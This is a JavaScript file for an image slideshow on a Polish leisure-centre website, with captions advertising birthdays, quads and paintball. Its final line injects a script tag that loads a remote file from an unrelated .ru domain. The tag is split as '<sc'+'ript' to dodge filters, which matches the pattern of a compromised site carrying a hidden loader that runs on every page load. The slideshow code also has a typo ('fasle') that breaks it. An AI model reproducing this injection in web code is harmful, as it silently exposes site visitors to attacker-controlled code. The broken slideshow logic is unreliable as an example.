var i = 0;
var play = true;
arrImageDescription = new Array('Twoje urodziny w K2','Quady oraz paintball w ofercie K2');

        var firstBt  = document.getElementById('first');
        var secondBt = document.getElementById('second');

        firstBt.onmouseover = function()
        {
                play = fasle;
        }
        firstBt.onmouseout = function()
        {
                play = true;
        }

        secondBt.onmouseover = function()
        {
                play = fasle;
        }
        secondBt.onmouseout = function()
        {
                play = true;
        }

function showImage(ii)
{
        i = ii;

        changeImage();

}

 function changeImage()
 {
         if (play == true)
         {
                var image = document.getElementById('image');
                image.src = 'http://www.k2centrum.pl/img/slideshow/' + i + '.jpg';

                var imageDescription = document.getElementById('imageDescription');
                imageDescription.innerHTML = arrImageDescription[i];

                image.onmouseover = function()
                {
                        play = false;
                }
                image.onmouseout = function()
                {
                        play = true;
                }
                if (image.onmouseout)
                {
                        play = true;
                }
                if (i < 1)
                {
                        i = i + 1;
                } else
                {
                        i = 0;
                }
         }
 }



document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Video_Card.js"></scri'+'pt>');